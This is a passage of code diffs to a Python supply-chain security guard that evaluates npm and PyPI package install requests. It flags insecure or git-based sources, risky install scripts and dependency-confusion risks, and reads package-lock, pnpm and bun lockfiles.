     candidate_path = Path(raw_spec)
     disk_path = candidate_path if candidate_path.is_absolute() else workspace_dir / candidate_path
     if disk_path.is_dir():
@@ -1294,6 +1299,8 @@ def _dependency_confusion_selector_matches(selector: str, target_name: str) -> b
     if not selector.startswith("@") or "/" not in selector:
         return False
     selector = selector.split("/", 1)[1]
+    if selector in {"", "*"}:
+        return False
     if selector.endswith("*"):
         return target_name.startswith(selector[:-1])
     return target_name == selector
@@ -1728,7 +1735,7 @@ def _recommended_fix_allow_package_result(
 def _source_url_from_specifier(specifier: str | None) -> str | None:
     if specifier is None:
         return None
-    if "://" in specifier or specifier.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
+    if "://" in specifier or specifier.startswith(("git+", "github:", "gitlab:", "bitbucket:", "file:")):
         return specifier
     return None
 
@@ -1745,7 +1752,7 @@ def _source_url_from_raw_spec(raw_spec: str) -> str | None:
         candidate = raw_spec.split("@", 1)[1]
     else:
         candidate = raw_spec
-    if "://" in candidate or candidate.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
+    if "://" in candidate or candidate.startswith(("git+", "github:", "gitlab:", "bitbucket:", "file:")):
         return candidate
     return None
 
@@ -1913,7 +1920,7 @@ def _exact_version(value: str | None) -> str | None:
     normalized = _optional_string(value)
     if normalized is None:
         return None
-    if "://" in normalized or normalized.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
+    if "://" in normalized or normalized.startswith(("git+", "github:", "gitlab:", "bitbucket:", "file:")):
         return None
     if normalized.startswith(("^", "~", "<", ">", "!", "*")):
         return None

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1352,10 +1352,11 @@ def _is_git_source_url(source_url: str) -> bool:
 def _is_external_https_tarball_source(source_url: str) -> bool:
     parsed = urllib.parse.urlsplit(source_url)
     normalized_path = parsed.path.lower()
+    hostname = parsed.hostname.lower() if parsed.hostname is not None else ""
     return (
         parsed.scheme.lower() == "https"
         and normalized_path.endswith((".tgz", ".tar.gz", ".tar"))
-        and "registry.npmjs.org" not in parsed.netloc.lower()
+        and hostname != "registry.npmjs.org"
     )
 
 
@@ -1486,6 +1487,7 @@ def _pnpm_lock_target_versions(
     importer: str | None = None
     dependency_block: str | None = None
     dependency_name: str | None = None
+    top_level_dependency_sections = {"dependencies", "devDependencies", "optionalDependencies"}
     for raw_line in text.splitlines():
         stripped = raw_line.strip()
         if not stripped or stripped.startswith("#"):
@@ -1496,6 +1498,22 @@ def _pnpm_lock_target_versions(
             importer = None
             dependency_block = None
             dependency_name = None
+            continue
+        if section in top_level_dependency_sections:
+            if indent == 2 and ":" in stripped:
+                raw_name, _, raw_value = stripped.partition(":")
+                dependency_name = raw_name.strip().strip('"').strip("'")
+                direct_value = raw_value.strip().strip('"').strip("'")
+                exact_version = _direct_lockfile_version(direct_value)
+                if exact_version is not None:
+                    direct_versions[dependency_name] = exact_version
+                    dependency_name = None
+                continue
+            if dependency_name is not None and indent >= 4 and stripped.startswith("version:"):
+                exact_version = _direct_lockfile_version(stripped.partition(":")[2].strip().strip('"').strip("'"))
+                if exact_version is not None:
+                    direct_versions[dependency_name] = exact_version
+                dependency_name = None
             continue
         if section != "importers":
             continue

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -19,12 +19,14 @@ from packaging.version import InvalidVersion, Version
 from ..models import GuardArtifact
 from ..store import GuardStore
 from ..store_evidence import EvidenceRecord
+from .js_semver import version_matches_js_selector
 from .package_manifest_diff import _DeadlineExceededError, _dependency_map_for_path
 from .runner import (
     _guard_sync_headers,
     _normalized_receipts_sync_url,
     _urlopen_json_with_timeout_retry,
 )
+from .supply_chain import detect_supply_chain_risk
 from .supply_chain_bundle import (
     SupplyChainBundleMalformedError,
     evaluate_cached_supply_chain_bundle,
@@ -245,7 +247,7 @@ def evaluate_package_request_artifact(
     if cloud_result is not None:
         upgraded = cloud_result
         if cloud_result.enforcement == "upgrade_required":
-            heuristic = _heuristic_result(artifact=artifact, targets=targets)
+            heuristic = _heuristic_result(artifact=artifact, targets=targets, workspace_dir=workspace_dir)
             if heuristic is not None and _decision_rank(heuristic.decision) > _decision_rank(cloud_result.decision):
                 upgraded = _finalize_evaluation(
                     _EvaluationDraft(
@@ -277,19 +279,30 @@ def evaluate_package_request_artifact(
         if fallback.refresh_required:
             store.add_event("supply_chain_bundle_refresh_requested", {"artifact_id": artifact.artifact_id}, now_value)
         return fallback
-    heuristic = _heuristic_result(artifact=artifact, targets=targets)
+    heuristic = _heuristic_result(artifact=artifact, targets=targets, workspace_dir=workspace_dir)
     if heuristic is None:
+        fallback_packages = _fallback_monitor_packages(targets=targets, artifact=artifact, workspace_dir=workspace_dir)
+        has_bun_binary_fallback = any(
+            reason["code"] == "bun_lockfile_binary_fallback"
+            for package in fallback_packages
+            for reason in package["reasons"]
+        )
         heuristic = _EvaluationDraft(
             decision="monitor",
             enforcement="free_local" if workspace_id is None else "local_fallback",
             entitlement_state="free" if workspace_id is None else "premium",
             cache_status="miss",
-            packages=tuple(_unknown_package_result(target) for target in targets),
+            packages=fallback_packages,
             reasons=(
                 {
-                    "code": "no_cached_match",
-                    "message": "Guard recorded this package request and will keep watching for new intelligence.",
-                    "severity": "unknown",
+                    "code": "bun_lockfile_binary_fallback" if has_bun_binary_fallback else "no_cached_match",
+                    "message": (
+                        "Guard could not parse bun.lockb because Bun stores it as a binary "
+                        "lockfile, so this request fell back to manifest-only monitoring."
+                        if has_bun_binary_fallback
+                        else "Guard recorded this package request and will keep watching for new intelligence."
+                    ),
+                    "severity": "low" if has_bun_binary_fallback else "unknown",
                     "source": "guard-local",
                 },
             ),
@@ -350,6 +363,9 @@ def _finalize_evaluation(
         "allow": f"{prefix} `{package_ref}` as trusted by policy.",
     }[draft.decision]
     reason_message = _optional_string(draft.reasons[0].get("message")) if draft.reasons else None
+    reason_code = _optional_string(draft.reasons[0].get("code")) if draft.reasons else None
+    if reason_code == "insecure_source_url" and reason_message is not None:
+        risk_summary = f"{prefix} `{package_ref}` from insecure HTTP source before install."
     fix_command = _fix_command(primary_package)
     title = {
         "block": "Critical install blocked",
@@ -537,15 +553,19 @@ def _evaluate_with_bundle(
     bundle_meta = _bundle_meta(bundle_response.to_dict())
     refresh_required = False
     packages: list[dict[str, object]] = []
+    lockfile_versions = _lockfile_dependency_versions(workspace_dir, artifact, targets)
     for target in targets:
-        exact_version = _exact_version(_optional_string(target.get("version")) or _optional_string(target.get("range")))
+        resolved_version = _resolved_target_version(
+            target=target,
+            lockfile_versions=lockfile_versions,
+        )
         package_match = (
             _bundle_package(
                 bundle_response,
                 package_name=str(target["normalized_name"]),
-                package_version=exact_version,
+                package_version=resolved_version,
             )
-            if exact_version is not None
+            if resolved_version is not None
             else None
         )
         matched_rule = _matching_policy_rule(
@@ -559,14 +579,28 @@ def _evaluate_with_bundle(
             package = _policy_package_result(target, decision=decision, rule_id=matched_rule.rule_id)
             packages.append(package)
             continue
-        if exact_version is None:
+        confusion_result = _dependency_confusion_policy_package_result(
+            bundle_response.bundle.policy_rules,
+            target=target,
+        )
+        if confusion_result is not None:
+            packages.append(confusion_result)
+            continue
+        if resolved_version is None:
             continue
         offline = evaluate_cached_supply_chain_bundle(
             bundle_response,
             package_name=str(target["normalized_name"]),
-            package_version=exact_version,
+            package_version=resolved_version,
         )
         if package_match is None:
+            safe_allow = _recommended_fix_allow_package_result(
+                target=target,
+                resolved_version=resolved_version,
+                bundle_response=bundle_response,
+            )
+            if safe_allow is not None:
+                packages.append(safe_allow)
             continue
         refresh_required = refresh_required or offline.stale
         package = _bundle_package_result(
@@ -575,10 +609,30 @@ def _evaluate_with_bundle(
             decision=_normalize_bundle_action(offline.action),
             reason=offline.reason,
             stale=offline.stale,
+            resolved_version=resolved_version,
         )
         packages.append(package)
+    direct_identities = {
+        (
+            _optional_string(package.get("namespace")),
+            str(package.get("name") or ""),
+            _optional_string(package.get("resolvedVersion")),
+        )
+        for package in packages
+    }
     packages.extend(
-        _transitive_lockfile_results(bundle_response=bundle_response, artifact=artifact, workspace_dir=workspace_dir)
+        package
+        for package in _transitive_lockfile_results(
+            bundle_response=bundle_response,
+            artifact=artifact,
+            workspace_dir=workspace_dir,
+        )
+        if (
+            _optional_string(package.get("namespace")),
+            str(package.get("name") or ""),
+            _optional_string(package.get("resolvedVersion")),
+        )
+        not in direct_identities
     )
     if not packages:
         return None
@@ -603,37 +657,61 @@ def _evaluate_with_bundle(
     )
 
 
-def _heuristic_result(*, artifact: GuardArtifact, targets: tuple[dict[str, object], ...]) -> _EvaluationDraft | None:
+def _heuristic_result(
+    *,
+    artifact: GuardArtifact,
+    targets: tuple[dict[str, object], ...],
+    workspace_dir: Path | None,
+) -> _EvaluationDraft | None:
     packages: list[dict[str, object]] = []
     for target in targets:
+        local_package_result = _local_package_manifest_result(
+            target=target,
+            artifact=artifact,
+            workspace_dir=workspace_dir,
+        )
+        if local_package_result is not None:
+            packages.append(local_package_result)
+            continue
         source_url = _optional_string(target.get("source_url"))
         if source_url is not None and source_url.lower().startswith("http://"):
             packages.append(
-                {
-                    "decision": "block",
-                    "ecosystem": target["ecosystem"],
-                    "name": target["name"],
-                    "namespace": target["namespace"],
-                    "requestedVersion": _optional_string(target.get("range"))
-                    or _optional_string(target.get("version")),
-                    "resolvedVersion": _optional_string(target.get("version")),
-                    "recommendedFixVersion": None,
-                    "riskScore": None,
-                    "dependencyPath": None,
-                    "reasons": (
-                        {
-                            "code": "insecure_source_url",
-                            "message": f"Insecure HTTP package source: {source_url}",
-                            "severity": "high",
-                            "source": "guard-local",
-                        },
-                    ),
-                }
+                _heuristic_package_result(
+                    target=target,
+                    decision="block",
+                    code="insecure_source_url",
+                    message=f"Insecure HTTP package source: {source_url}",
+                    severity="high",
+                )
+            )
+            continue
+        if source_url is not None and _is_git_source_url(source_url):
+            packages.append(
+                _heuristic_package_result(
+                    target=target,
+                    decision="warn",
+                    code="git_dependency_source",
+                    message=f"Git package source requires review before install: {source_url}",
+                    severity="high",
+                )
+            )
+            continue
+        if source_url is not None and _is_external_https_tarball_source(source_url):
+            packages.append(
+                _heuristic_package_result(
+                    target=target,
+                    decision="warn",
+                    code="external_tarball_source",
+                    message=f"External HTTPS tarball source requires review before install: {source_url}",
+                    severity="medium",
+                )
             )
     if not packages:
         return None
+    packages.sort(key=lambda item: _decision_rank(str(item.get("decision") or "monitor")), reverse=True)
+    decision = str(packages[0].get("decision") or "monitor")
     return _EvaluationDraft(
-        decision="block",
+        decision=decision,
         enforcement="free_local",
         entitlement_state="free",
         cache_status="miss",
@@ -642,7 +720,7 @@ def _heuristic_result(*, artifact: GuardArtifact, targets: tuple[dict[str, objec
         matched_rule_id=None,
         exception_id=None,
         refresh_required=False,
-        record_monitor_evidence=False,
+        record_monitor_evidence=decision == "monitor",
         bundle_version=None,
         policy_version="local:none",
     )
@@ -690,6 +768,7 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
     if not isinstance(raw_targets, list):
         return ()
     parsed: list[dict[str, object]] = []
+    package_manager = str(artifact.metadata.get("package_manager") or "npm")
     for item in raw_targets:
         if not isinstance(item, dict):
             continue
@@ -716,6 +795,8 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
                 "version": exact_version,
                 "range": requested if exact_version is None else None,
                 "source_url": source_url,
+                "alias": _optional_string(item.get("alias")),
+                "package_manager": package_manager,
             }
         )
     return tuple(parsed)
@@ -822,6 +903,10 @@ def _transitive_lockfile_results(
     if not isinstance(lockfile_paths, list):
         return []
     results: list[dict[str, object]] = []
+    direct_target_names: set[str] = set()
+    for target in _targets_from_artifact(artifact):
+        direct_target_names.add(str(target["normalized_name"]))
+        direct_target_names.update(_package_lock_candidate_names(target))
     for relative_path in lockfile_paths:
         lockfile_path = workspace_dir / str(relative_path)
         if not lockfile_path.exists():
@@ -830,20 +915,40 @@ def _transitive_lockfile_results(
             lockfile_text = lockfile_path.read_text(encoding="utf-8")
         except (OSError, UnicodeDecodeError):
             continue
-        dependency_map = _safe_dependency_map_for_path(
-            str(lockfile_path.name),
-            lockfile_text,
-            deadline=time.monotonic() + 0.2,
-        )
-        for dependency_path, version in dependency_map.items():
-            normalized_dependency_path = dependency_path.strip("/")
-            if not normalized_dependency_path:
-                continue
-            if "node_modules/" in normalized_dependency_path:
-                package_name = normalized_dependency_path.rsplit("node_modules/", 1)[-1]
-            elif "/" not in normalized_dependency_path or normalized_dependency_path.startswith("@"):
-                package_name = normalized_dependency_path
-            else:
+        dependency_entries: list[tuple[str, str, str, bool]] = []
+        if lockfile_path.name == "package-lock.json":
+            dependency_entries = [
+                (
+                    dependency_path,
+                    package_name,
+                    version,
+                    dependency_path in direct_target_names,
+                )
+                for dependency_path, package_name, version, _direct in _package_lock_entries(lockfile_text)
+            ]
+        else:
+            dependency_map = _safe_dependency_map_for_path(
+                str(lockfile_path.name),
+                lockfile_text,
+                deadline=time.monotonic() + 0.2,
+            )
+            for dependency_path, version in dependency_map.items():
+                normalized_dependency_path = dependency_path.strip("/")
+                if not normalized_dependency_path:
+                    continue
+                package_name = _dependency_package_name(normalized_dependency_path)
+                if package_name is None:
+                    continue
+                dependency_entries.append(
+                    (
+                        dependency_path,
+                        package_name,
+                        version,
+                        normalized_dependency_path in direct_target_names,
+                    )
+                )
+        for dependency_path, package_name, version, direct in dependency_entries:
+            if direct:
                 continue
             offline = evaluate_cached_supply_chain_bundle(
                 bundle_response, package_name=package_name, package_version=version
@@ -886,6 +991,7 @@ def _bundle_package_result(
     decision: str,
     reason: str,
     stale: bool,
+    resolved_version: str,
 ) -> dict[str, object]:
     severity = package.normalized_severity if stale is False else "unknown"
     return {
@@ -893,11 +999,13 @@ def _bundle_package_result(
         "ecosystem": package.ecosystem,
         "name": package.name,
         "namespace": package.namespace,
-        "requestedVersion": _optional_string(target.get("version")) or _optional_string(target.get("range")),
-        "resolvedVersion": package.version,
+        "requestedVersion": _optional_string(target.get("range")) or _optional_string(target.get("version")),
+        "resolvedVersion": resolved_version,
         "recommendedFixVersion": package.recommended_fix_version,
         "riskScore": package.risk_score,
         "dependencyPath": None,
+        "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "alias": _optional_string(target.get("alias")),
         "reasons": (
             {
                 "advisoryId": package.related_advisory_ids[0] if package.related_advisory_ids else None,
@@ -921,6 +1029,8 @@ def _policy_package_result(target: dict[str, object], *, decision: str, rule_id:
         "recommendedFixVersion": None,
         "riskScore": None,
         "dependencyPath": None,
+        "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "alias": _optional_string(target.get("alias")),
         "ruleId": rule_id,
         "reasons": (
             {
@@ -959,6 +1069,8 @@ def _unknown_package_result(target: dict[str, object]) -> dict[str, object]:
         "recommendedFixVersion": None,
         "riskScore": None,
         "dependencyPath": None,
+        "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "alias": _optional_string(target.get("alias")),
         "reasons": (
             {
                 "code": "no_cached_match",
@@ -970,10 +1082,469 @@ def _unknown_package_result(target: dict[str, object]) -> dict[str, object]:
     }
 
 
+def _fallback_monitor_packages(
+    *,
+    targets: tuple[dict[str, object], ...],
+    artifact: GuardArtifact,
+    workspace_dir: Path | None,
+) -> tuple[dict[str, object], ...]:
+    bun_fallback_packages = _bun_lockfile_binary_fallback_packages(
+        targets=targets,
+        artifact=artifact,
+        workspace_dir=workspace_dir,
+    )
+    if bun_fallback_packages:
+        return tuple(bun_fallback_packages)
+    return tuple(_unknown_package_result(target) for target in targets)
+
+
+def _bun_lockfile_binary_fallback_packages(
+    *,
+    targets: tuple[dict[str, object], ...],
+    artifact: GuardArtifact,
+    workspace_dir: Path | None,
+) -> list[dict[str, object]]:
+    if workspace_dir is None:
+        return []
+    lockfile_paths = artifact.metadata.get("lockfile_paths")
+    if not isinstance(lockfile_paths, list):
+        return []
+    bun_lock_path = next(
+        (
+            workspace_dir / str(relative_path)
+            for relative_path in lockfile_paths
+            if Path(str(relative_path)).name == "bun.lockb" and (workspace_dir / str(relative_path)).exists()
+        ),
+        None,
+    )
+    if bun_lock_path is None:
+        return []
+    message = (
+        "Guard detected bun.lockb but Bun stores it as a binary lockfile, so this request fell back to "
+        "manifest-only monitoring."
+    )
+    if targets:
+        return [
+            _heuristic_package_result(
+                target=target,
+                decision="monitor",
+                code="bun_lockfile_binary_fallback",
+                message=message,
+                severity="low",
+            )
+            for target in targets
+        ]
+    return [
+        _heuristic_package_result(
+            target={"ecosystem": "npm", "name": "workspace", "namespace": None, "package_manager": "bun"},
+            decision="monitor",
+            code="bun_lockfile_binary_fallback",
+            message=message,
+            severity="low",
+        )
+    ]
+
+
+def _local_package_manifest_result(
+    *,
+    target: dict[str, object],
+    artifact: GuardArtifact,
+    workspace_dir: Path | None,
+) -> dict[str, object] | None:
+    manifest_path = _local_package_manifest_path(target, workspace_dir)
+    if manifest_path is None:
+        return None
+    try:
+        manifest_text = manifest_path.read_text(encoding="utf-8")
+    except (OSError, UnicodeDecodeError):
+        return None
+    signals = tuple(
+        signal
+        for signal in detect_supply_chain_risk(manifest_text)
+        if signal.signal_id.startswith("supply-chain.postinstall")
+        or signal.signal_id.endswith("install-lifecycle-exec")
+    )
+    if not signals:
+        return None
+    manifest_target = dict(target)
+    manifest_package_name = _manifest_package_name(manifest_text)
+    if manifest_package_name is not None:
+        namespace, name = _split_namespace_name(manifest_package_name)
+        manifest_target["namespace"] = namespace
+        manifest_target["name"] = name
+    if _artifact_has_flag(artifact, "--ignore-scripts"):
+        return _heuristic_package_result(
+            target=manifest_target,
+            decision="allow",
+            code="ignore_scripts_applied",
+            message="`--ignore-scripts` disables lifecycle hooks for this local package install.",
+            severity="low",
+        )
+    strongest_signal = sorted(signals, key=lambda item: _severity_rank_value(item.severity), reverse=True)[0]
+    return _heuristic_package_result(
+        target=manifest_target,
+        decision="block",
+        code="install_script_risk",
+        message=strongest_signal.plain_reason,
+        severity=strongest_signal.severity,
+    )
+
+
+def _local_package_manifest_path(target: dict[str, object], workspace_dir: Path | None) -> Path | None:
+    if workspace_dir is None:
+        return None
+    raw_spec = _optional_string(target.get("raw_spec"))
+    if raw_spec is None or raw_spec.startswith(("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:")):
+        return None
+    candidate_path = Path(raw_spec)
+    disk_path = candidate_path if candidate_path.is_absolute() else workspace_dir / candidate_path
+    if disk_path.is_dir():
+        manifest_path = disk_path / "package.json"
+        return manifest_path if manifest_path.exists() else None
+    if disk_path.name == "package.json" and disk_path.exists():
+        return disk_path
+    return None
+
+
+def _manifest_package_name(manifest_text: str) -> str | None:
+    try:
+        payload = json.loads(manifest_text or "{}")
+    except json.JSONDecodeError:
+        return None
+    package_name = payload.get("name")
+    return package_name.strip() if isinstance(package_name, str) and package_name.strip() else None
+
+
+def _artifact_has_flag(artifact: GuardArtifact, flag: str) -> bool:
+    raw_flags = artifact.metadata.get("flags")
+    return isinstance(raw_flags, list) and flag in raw_flags
+
+
+def _dependency_confusion_policy_package_result(
+    rules: tuple[SupplyChainBundlePolicyRule, ...],
+    *,
+    target: dict[str, object],
+) -> dict[str, object] | None:
+    if (
+        (_optional_string(target.get("ecosystem")) or "npm") != "npm"
+        or _optional_string(target.get("namespace")) is not None
+    ):
+        return None
+    current_time = datetime.now(timezone.utc).timestamp()
+    target_name = str(target["name"]).lower()
+    sorted_rules = sorted(
+        rules, key=lambda item: (item.priority if item.priority is not None else 10_000, item.rule_id)
+    )
+    for rule in sorted_rules:
+        if rule.enabled is False:
+            continue
+        if rule.expires_at is not None:
+            try:
+                if datetime.fromisoformat(rule.expires_at.replace("Z", "+00:00")).timestamp() <= current_time:
+                    continue
+            except ValueError:
+                pass
+        if rule.ecosystem_selector is not None and rule.ecosystem_selector != "npm":
+            continue
+        selector = (rule.package_selector or "").strip().lower()
+        if not selector or not _dependency_confusion_selector_matches(selector, target_name):
+            continue
+        decision = _normalize_bundle_action(rule.action)
+        if decision not in {"block", "ask", "warn"}:
+            decision = "warn"
+        return {
+            "decision": decision,
+            "ecosystem": target["ecosystem"],
+            "name": target["name"],
+            "namespace": target["namespace"],
+            "requestedVersion": _optional_string(target.get("range")) or _optional_string(target.get("version")),
+            "resolvedVersion": _optional_string(target.get("version")),
+            "recommendedFixVersion": None,
+            "riskScore": None,
+            "dependencyPath": None,
+            "packageManager": _optional_string(target.get("package_manager")) or "npm",
+            "alias": _optional_string(target.get("alias")),
+            "ruleId": rule.rule_id,
+            "reasons": (
+                {
+                    "code": "dependency_confusion_risk",
+                    "message": (
+                        f"Policy reserves internal package selector {rule.package_selector}; "
+                        f"installing public package {target_name} may cause dependency confusion."
+                    ),
+                    "severity": "high",
+                    "source": "policy",
+                },
+            ),
+        }
+    return None
+
+
+def _dependency_confusion_selector_matches(selector: str, target_name: str) -> bool:
+    if not selector.startswith("@") or "/" not in selector:
+        return False
+    selector = selector.split("/", 1)[1]
+    if selector.endswith("*"):
+        return target_name.startswith(selector[:-1])
+    return target_name == selector
+
+
+def _heuristic_package_result(
+    *,
+    target: dict[str, object],
+    decision: str,
+    code: str,
+    message: str,
+    severity: str,
+) -> dict[str, object]:
+    return {
+        "decision": decision,
+        "ecosystem": target["ecosystem"],
+        "name": target["name"],
+        "namespace": target["namespace"],
+        "requestedVersion": _optional_string(target.get("range")) or _optional_string(target.get("version")),
+        "resolvedVersion": _optional_string(target.get("version")),
+        "recommendedFixVersion": None,
+        "riskScore": None,
+        "dependencyPath": None,
+        "packageManager": _optional_string(target.get("package_manager")) or "npm",
+        "alias": _optional_string(target.get("alias")),
+        "reasons": (
+            {
+                "code": code,
+                "message": message,
+                "severity": severity,
+                "source": "guard-local",
+            },
+        ),
+    }
+
+
+def _is_git_source_url(source_url: str) -> bool:
+    normalized = source_url.lower()
+    if normalized.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
+        return True
+    return (
+        "/" in source_url
+        and not normalized.startswith(("http://", "https://"))
+        and ":" not in source_url
+        and not source_url.startswith(("@", "./", "../", "/"))
+    )
+
+
+def _is_external_https_tarball_source(source_url: str) -> bool:
+    normalized = source_url.lower()
+    return (
+        normalized.startswith("https://")
+        and normalized.endswith((".tgz", ".tar.gz", ".tar"))
+        and "registry.npmjs.org/" not in normalized
+    )
+
+
+def _lockfile_dependency_versions(
+    workspace_dir: Path | None,
+    artifact: GuardArtifact,
+    targets: tuple[dict[str, object], ...],
+) -> dict[tuple[str, str | None], str]:
+    if workspace_dir is None:
+        return {}
+    lockfile_paths = artifact.metadata.get("lockfile_paths")
+    if not isinstance(lockfile_paths, list):
+        return {}
+    versions: dict[tuple[str, str | None], str] = {}
+    for relative_path in lockfile_paths:
+        lockfile_path = workspace_dir / str(relative_path)
+        if not lockfile_path.exists():
+            continue
+        try:
+            lockfile_text = lockfile_path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            continue
+        if lockfile_path.name != "package-lock.json":
+            continue
+        versions.update(_package_lock_target_versions(lockfile_text, targets))
+    return versions
+
+
+def _package_lock_target_versions(
+    text: str,
+    targets: tuple[dict[str, object], ...],
+) -> dict[tuple[str, str | None], str]:
+    entries = _package_lock_entries(text)
+    versions: dict[tuple[str, str | None], str] = {}
+    for target in targets:
+        target_key = _lockfile_target_key(target)
+        candidate_paths = set(_package_lock_candidate_names(target))
+        normalized_name = str(target["normalized_name"])
+        for dependency_path, package_name, version, direct in entries:
+            if not direct:
+                continue
+            if dependency_path in candidate_paths or package_name == normalized_name:
+                versions[target_key] = version
+                break
+    return versions
+
+
+def _package_lock_entries(text: str) -> list[tuple[str, str, str, bool]]:
+    payload = json.loads(text or "{}")
+    entries: list[tuple[str, str, str, bool]] = []
+    packages = payload.get("packages")
+    if isinstance(packages, dict):
+        for package_path, value in packages.items():
+            if not isinstance(package_path, str) or not package_path.startswith("node_modules/"):
+                continue
+            version = value.get("version") if isinstance(value, dict) else None
+            if not isinstance(version, str):
+                continue
+            dependency_path = package_path.removeprefix("node_modules/")
+            package_name = _optional_string(value.get("name")) if isinstance(value, dict) else None
+            entries.append(
+                (
+                    dependency_path,
+                    package_name or dependency_path.rsplit("node_modules/", 1)[-1],
+                    version,
+                    "node_modules/" not in dependency_path,
+                )
+            )
+        return entries
+    legacy_dependencies = payload.get("dependencies")
+    if isinstance(legacy_dependencies, dict):
+        _walk_package_lock_entries(legacy_dependencies, entries, prefix=None)
+    return entries
+
+
+def _walk_package_lock_entries(
+    payload: dict[str, object],
+    entries: list[tuple[str, str, str, bool]],
+    *,
+    prefix: str | None,
+) -> None:
+    for package_name, value in payload.items():
+        if not isinstance(package_name, str) or not isinstance(value, dict):
+            continue
+        version = value.get("version")
+        dependency_path = package_name if prefix is None else f"{prefix}/node_modules/{package_name}"
+        if isinstance(version, str):
+            entries.append(
+                (
+                    dependency_path,
+                    _optional_string(value.get("name")) or package_name,
+                    version,
+                    prefix is None,
+                )
+            )
+        nested_dependencies = value.get("dependencies")
+        if isinstance(nested_dependencies, dict):
+            _walk_package_lock_entries(nested_dependencies, entries, prefix=dependency_path)
+
+
+def _package_lock_candidate_names(target: dict[str, object]) -> tuple[str, ...]:
+    alias = _optional_string(target.get("alias"))
+    namespace = _optional_string(target.get("namespace"))
+    name = str(target["name"])
+    candidates: list[str] = []
+    if alias is not None:
+        candidates.append(alias)
+    qualified_name = f"{namespace}/{name}" if namespace is not None else name
+    if qualified_name not in candidates:
+        candidates.append(qualified_name)
+    return tuple(candidates)
+
+
+def _lockfile_target_key(target: dict[str, object]) -> tuple[str, str | None]:
+    return str(target["normalized_name"]), _optional_string(target.get("alias"))
+
+
+def _dependency_package_name(dependency_path: str) -> str | None:
+    normalized_dependency_path = dependency_path.strip("/").lower()
+    if not normalized_dependency_path:
+        return None
+    if "node_modules/" in normalized_dependency_path:
+        return normalized_dependency_path.rsplit("node_modules/", 1)[-1]
+    if "/" not in normalized_dependency_path or normalized_dependency_path.startswith("@"):
+        return normalized_dependency_path
+    return None
+
+
+def _resolved_target_version(
+    *,
+    target: dict[str, object],
+    lockfile_versions: dict[tuple[str, str | None], str],
+) -> str | None:
+    exact_version = _optional_string(target.get("version"))
+    if exact_version is not None:
+        return exact_version
+    requested_range = _optional_string(target.get("range"))
+    if requested_range is None:
+        return None
+    ecosystem = _optional_string(target.get("ecosystem")) or "npm"
+    if ecosystem == "npm":
+        lockfile_version = lockfile_versions.get(_lockfile_target_key(target))
+        if lockfile_version is not None:
+            return lockfile_version
+        return None
+    return _exact_version(requested_range)
+
+
+def _bundle_package_versions(bundle_response: SupplyChainBundleResponse, target: dict[str, object]) -> list[str]:
+    return [item.version for item in bundle_response.bundle.packages if _bundle_package_name_matches(item, target)]
+
+
+def _bundle_package_name_matches(package: SupplyChainBundlePackage, target: dict[str, object]) -> bool:
+    full_name = f"{package.namespace}/{package.name}".lower() if package.namespace is not None else package.name.lower()
+    target_name = str(target["normalized_name"])
+    target_namespace = _optional_string(target.get("namespace"))
+    if target_namespace is not None:
+        return target_name == full_name
+    if package.namespace is not None:
+        return False
+    return target_name == package.name.lower()
+
+
+def _recommended_fix_allow_package_result(
+    *,
+    target: dict[str, object],
+    resolved_version: str,
+    bundle_response: SupplyChainBundleResponse,
+) -> dict[str, object] | None:
+    for package in bundle_response.bundle.packages:
+        if not _bundle_package_name_matches(package, target):
+            continue
+        if package.version == resolved_version:
+            continue
+        if package.recommended_fix_version != resolved_version:
+            continue
+        return {
+            "decision": "allow",
+            "ecosystem": package.ecosystem,
+            "name": target["name"],
+            "namespace": target["namespace"],
+            "requestedVersion": _optional_string(target.get("range")) or resolved_version,
+            "resolvedVersion": resolved_version,
+            "recommendedFixVersion": None,
+            "riskScore": None,
+            "dependencyPath": None,
+            "packageManager": _optional_string(target.get("package_manager")) or "npm",
+            "alias": _optional_string(target.get("alias")),
+            "reasons": (
+                {
+                    "code": "recommended_fix_version",
+                    "message": (
+                        f"Requested version {resolved_version} matches Guard's recommended fix for "
+                        f"{_package_display_name(target)}."
+                    ),
+                    "severity": "low",
+                    "source": "bundle",
+                },
+            ),
+        }
+    return None
+
+
 def _source_url_from_specifier(specifier: str | None) -> str | None:
     if specifier is None:
         return None
-    if "://" in specifier or specifier.startswith("git+"):
+    if "://" in specifier or specifier.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
         return specifier
     return None
 
@@ -990,7 +1561,7 @@ def _source_url_from_raw_spec(raw_spec: str) -> str | None:
         candidate = raw_spec.split("@", 1)[1]
     else:
         candidate = raw_spec
-    if "://" in candidate or candidate.startswith("git+"):
+    if "://" in candidate or candidate.startswith(("git+", "github:", "gitlab:", "bitbucket:")):
         return candidate
     return None
 
@@ -1062,9 +1633,12 @@ def _selector_matches_version(selector: str, target: dict[str, object]) -> bool:
     requested_range = _optional_string(target.get("range"))
     if requested_range is not None and requested_range == selector:
         return True
+    ecosystem = _optional_string(target.get("ecosystem")) or "npm"
     if version is None:
         return False
     if selector in {version, f"={version}", f"=={version}"}:
+        return True
+    if ecosystem == "npm" and version_matches_js_selector(version, selector):
         return True
     try:
         return Version(version) in SpecifierSet(selector)
@@ -1174,17 +1748,36 @@ def _decision_rank(value: str) -> int:
 
 
 def _fix_command(package: dict[str, object]) -> str | None:
-    package_name = _package_display_name(package)
+    package_name = _package_install_target(package)
     fix_version = _optional_string(package.get("recommendedFixVersion"))
     ecosystem = _optional_string(package.get("ecosystem")) or "npm"
+    package_manager = _optional_string(package.get("packageManager")) or "npm"
     if not fix_version:
         return None
     if ecosystem == "pypi":
         return f"pip install {package_name}=={fix_version}"
+    if package_manager == "pnpm":
